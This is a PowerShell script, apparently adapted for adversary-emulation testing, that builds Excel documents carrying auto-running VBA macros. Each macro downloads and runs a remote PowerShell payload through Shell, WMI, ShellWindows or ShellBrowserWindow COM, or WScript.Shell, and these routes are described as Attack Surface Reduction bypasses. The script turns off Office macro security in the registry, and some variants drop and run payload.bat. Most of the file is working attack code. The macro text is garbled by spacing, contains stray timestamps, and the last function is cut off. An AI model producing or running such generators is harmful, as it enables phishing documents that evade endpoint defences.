#Adopted and Originally Coded by Matt Nelson (@enigma0x3)
#Reference: https://github.com/enigma0x3/Generate-Macro/blob/master/Generate-Macro.ps1
<#
.SYNOPSIS
Standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method
.DESCRIPTION
This script will generate malicious Microsoft Excel documents that contain VBA macros.
The script will display a menu of different attacks, all with different ASR bypass methods; once an attack is chosen, the document is generated and saved.
When naming the document, don't include a file extension.
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.Attack Types
All 7 instances represent different ASR bypasses based on research performed by great folks within the industry. All macros were absorbed from https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3.
Additional references:
- https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
- https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
- https://www.darkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule
- https://posts.specterops.io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df
- https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/
.EXAMPLE
PS> ./Generate-Macro.ps1
Enter the name of the document (Do not include a file extension): FinancialData
--------Select Attack---------
1 . Chain Reaction Download and execute with Excel .
2 . Chain Reaction Download and execute with Excel, wmiprvse
3 . Chain Reaction Download and execute with Excel, wmiprvse benign
4 . Chain Reaction Download and execute with Excel Shell
5 . Chain Reaction Download and execute with Excel ShellBrowserWindow
6 . Chain Reaction Download and execute with Excel WshShell
7 . Chain Reaction Download and execute with Excel and POST C2 .
8 . Chain Reaction Download and execute with Excel and GET C2 .
------------------------------
Saved to file C:\Users\Malware\Desktop\FinancialData.xls
PS>
#>
# Output location and file name shared by every attack function below (they all read $global:FullName).
# The document name comes from the operator via Read-Host and is concatenated into the path without any
# validation: nothing strips an extension the prompt asks the user to omit, and a value containing "\" or ".."
# changes where the .xls is written.
# NOTE(review): the padding spaces inside the string literals (" $env:userprofile \Desktop ", " .xls ") look like
# extraction artifacts in this copy of the file; as written they would end up in the path — confirm against upstream.
$global:defLoc = " $env:userprofile \Desktop "
$global:Name = Read-Host " Enter the name of the document (Do not include a file extension) "
$global:Name = $global:Name + " .xls "
$global:FullName = " $global:defLoc \ $global:Name "
function Excel-Shell {
<#
.SYNOPSIS
Standard macro execution: Auto_Open calls the VBA Shell() function directly from Excel.
.DESCRIPTION
Builds an .xls workbook whose Auto_Open macro calls Shell() with a "cmd.exe /c powershell.exe IEX(IWR ...)" command
line that downloads and runs the chain_reaction_DragonsTail.ps1 script named in the here-string below.
Steps: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security so the VBA project can be written programmatically; add a
standard module containing $Code; save to $global:FullName as xlExcel8; release Excel; write both registry values
back to 0.
Side effects on the generating host: HKCU registry writes, a file at $global:FullName, and every running excel
process is killed. Reads $global:FullName; returns nothing (the saved path goes to the output stream).
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals
(e.g. " Excel.Application ") and between every character of the here-string, presumably from extraction; the
comments below describe the statements as intended.
#>
#create macro: VBA source inserted into the workbook (one Sub Auto_Open containing a single Shell() call).
$Code = @"
S u b A u t o _ O p e n ( )
C a l l S h e l l ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , 1 )
E n d S u b
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Benign-Trampoline {
<#
.SYNOPSIS
Uses WMI (via GetObject) to download and execute a chain reaction through wmiprvse. This version will not execute mimikatz.
.DESCRIPTION
The Auto_Open macro builds the "winmgmts:" moniker and the "Win32_ProcessStartup" / "Win32_Process" class names from
concatenated string fragments, sets ShowWindow = 0 (hidden) on the startup object, and calls Win32_Process.Create with a
"cmd.exe /c powershell.exe IEX(IWR ...)" command line that downloads and runs dragonstail_benign.ps1. The process is
created by the WMI provider host (wmiprvse) rather than by Excel.
Steps on the generating host: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security; add a standard module containing $Code; save to
$global:FullName as xlExcel8; release Excel; write both registry values back to 0.
Side effects: HKCU registry writes, a file at $global:FullName, and every running excel process is killed.
Reads $global:FullName; returns nothing.
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals and between every
character of the here-string, presumably from extraction; the comments describe the statements as intended.
NOTE(review): the two bare timestamp lines inside the here-string below ("2020-10-05 ..." and "2019-08-28 ...") look like
blame/commit annotations left by extraction, not macro text; as written they would be inserted into the VBA module
verbatim — confirm against upstream.
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t H I D D E N _ W I N D O W = 0
s t r C o m p u t e r = " . "
S e t o b j W M I S e r v i c e = G e t O b j e c t ( " w i n " & " m g m t s " & " : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " )
S e t o b j S t a r t u p = o b j W M I S e r v i c e . G e t ( " W i n 3 2 _ " & " P r o c e s s " & " S t a r t u p " )
S e t o b j C o n f i g = o b j S t a r t u p . S p a w n I n s t a n c e _
o b j C o n f i g . S h o w W i n d o w = H I D D E N _ W I N D O W
S e t o b j P r o c e s s = G e t O b j e c t ( " w i n m g m t s : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " & " : W i n 3 2 _ " & " P r o c e s s " )
2020-10-05 09:31:36 -07:00
o b j P r o c e s s . C r e a t e " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / d r a g o n s t a i l _ b e n i g n . p s 1 ' ) " , N u l l , o b j C o n f i g , i n t P r o c e s s I D
2019-08-28 12:38:26 -06:00
E n d S u b
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Trampoline {
<#
.SYNOPSIS
Uses WMI (via GetObject) to download and execute a chain reaction through wmiprvse.
.DESCRIPTION
Same macro as Excel-Com-Wmiprvse-Benign-Trampoline except for the downloaded script: this variant fetches and runs
chain_reaction_DragonsTail.ps1 (the "benign" wording in the original help text was a copy-paste from the benign variant).
The Auto_Open macro builds the "winmgmts:" moniker and the "Win32_ProcessStartup" / "Win32_Process" class names from
concatenated string fragments, sets ShowWindow = 0 (hidden), and calls Win32_Process.Create with a
"cmd.exe /c powershell.exe IEX(IWR ...)" command line; the process is created by the WMI provider host (wmiprvse).
Steps on the generating host: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security; add a standard module containing $Code; save to
$global:FullName as xlExcel8; release Excel; write both registry values back to 0.
Side effects: HKCU registry writes, a file at $global:FullName, and every running excel process is killed.
Reads $global:FullName; returns nothing.
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals and between every
character of the here-string, presumably from extraction; the comments describe the statements as intended.
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t H I D D E N _ W I N D O W = 0
s t r C o m p u t e r = " . "
S e t o b j W M I S e r v i c e = G e t O b j e c t ( " w i n " & " m g m t s " & " : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " )
S e t o b j S t a r t u p = o b j W M I S e r v i c e . G e t ( " W i n 3 2 _ " & " P r o c e s s " & " S t a r t u p " )
S e t o b j C o n f i g = o b j S t a r t u p . S p a w n I n s t a n c e _
o b j C o n f i g . S h o w W i n d o w = H I D D E N _ W I N D O W
S e t o b j P r o c e s s = G e t O b j e c t ( " w i n m g m t s : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " & " : W i n 3 2 _ " & " P r o c e s s " )
o b j P r o c e s s . C r e a t e " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , N u l l , o b j C o n f i g , i n t P r o c e s s I D
E n d S u b
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Trampoline {
<#
.SYNOPSIS
Excel COM trampoline through the ShellWindows object.
.DESCRIPTION
The Auto_Open macro obtains the ShellWindows COM object by CLSID via GetObject("new:" & CLSID) and calls
.Document.Application.ShellExecute on it with "cmd.exe" and a "/c powershell.exe IWR ... -OutFile ~\Documents\payload.bat;
~\Documents\payload.bat" argument string, working directory C:\Windows\System32 and window style 0 (hidden). Unlike the
Shell()/WMI variants this one first writes payload.bat under the victim's Documents folder and then runs it, so it leaves
a file on disk. The original help text said "wmiprvse will spawn cmd.exe" — that was copied from the WMI variant; the
sibling ShellBrowserWindow function documents the spawning parent as svchost/explorer, and presumably the same applies
here — confirm.
Steps on the generating host: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security; add a standard module containing $Code; save to
$global:FullName as xlExcel8; release Excel; write both registry values back to 0.
Side effects: HKCU registry writes, a file at $global:FullName, and every running excel process is killed.
Reads $global:FullName; returns nothing.
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals and between every
character of the here-string, presumably from extraction; the comments describe the statements as intended.
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t S h e l l W i n d o w s = _
" { 9 B A 0 5 9 7 2 - F 6 A 8 - 1 1 C F - A 4 4 2 - 0 0 A 0 C 9 0 A 8 F 3 9 } "
S e t S W = G e t O b j e c t ( " n e w : " & S h e l l W i n d o w s ) . I t e m ( )
S W . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e " c m d . e x e " , " / c p o w e r s h e l l . e x e I W R - u r i " " h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 " " - O u t F i l e " " ~ \ D o c u m e n t s \ p a y l o a d . b a t " " ; ~ \ D o c u m e n t s \ p a y l o a d . b a t " , " C : \ W i n d o w s \ S y s t e m 3 2 " , N u l l , 0
E n d S u b
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-ShellBrowserWindow {
<#
.SYNOPSIS
Excel COM trampoline through the ShellBrowserWindow object (the original help text said "Trampoline", copied from the ShellWindows variant).
.DESCRIPTION
The Auto_Open macro obtains the ShellBrowserWindow COM object by CLSID via GetObject("new:" & CLSID) and calls
.Document.Application.ShellExecute on it with "cmd.exe" and a "/c powershell.exe IWR ... -OutFile ~\Documents\payload.bat;
~\Documents\payload.bat" argument string, working directory C:\Windows\System32 and window style 0 (hidden). Per the
author, svchost/explorer rather than Excel ends up spawning cmd.exe. Like the ShellWindows variant it first writes
payload.bat under the victim's Documents folder and then runs it, so it leaves a file on disk.
Steps on the generating host: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security; add a standard module containing $Code; save to
$global:FullName as xlExcel8; release Excel; write both registry values back to 0.
Side effects: HKCU registry writes, a file at $global:FullName, and every running excel process is killed.
Reads $global:FullName; returns nothing.
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals and between every
character of the here-string, presumably from extraction; the comments describe the statements as intended.
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t S h e l l B r o w s e r W i n d o w = _
" { C 0 8 A F D 9 0 - F 2 A 1 - 1 1 D 1 - 8 4 5 5 - 0 0 A 0 C 9 1 F 3 8 8 0 } "
S e t S B W = G e t O b j e c t ( " n e w : " & S h e l l B r o w s e r W i n d o w )
S B W . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e " c m d . e x e " , " / c p o w e r s h e l l . e x e I W R - u r i " " h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 " " - O u t F i l e " " ~ \ D o c u m e n t s \ p a y l o a d . b a t " " ; ~ \ D o c u m e n t s \ p a y l o a d . b a t " , " C : \ W i n d o w s \ S y s t e m 3 2 " , N u l l , 0
E n d S u b
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-wshshell {
<#
.SYNOPSIS
Excel COM WshShell: the macro runs the command through WScript.Shell.Exec.
.DESCRIPTION
The Auto_Open macro does CreateObject("WScript.Shell") and calls .Exec with a "cmd.exe /c powershell.exe IEX(IWR ...)"
command line that downloads and runs chain_reaction_DragonsTail.ps1. The original help text (svchost/explorer spawning
cmd.exe) was copied from the ShellBrowserWindow variant; with WScript.Shell the parent of cmd.exe is presumably the
Excel process itself — confirm.
Steps on the generating host: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security; add a standard module containing $Code; save to
$global:FullName as xlExcel8; release Excel; write both registry values back to 0.
Side effects: HKCU registry writes, a file at $global:FullName, and every running excel process is killed.
Reads $global:FullName; returns nothing.
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals and between every
character of the here-string, presumably from extraction; the comments describe the statements as intended.
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
S e t W s h S h e l l = C r e a t e O b j e c t ( " W S c r i p t . S h e l l " )
S e t W s h S h e l l E x e c = W s h S h e l l . E x e c ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " )
E n d S u b
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
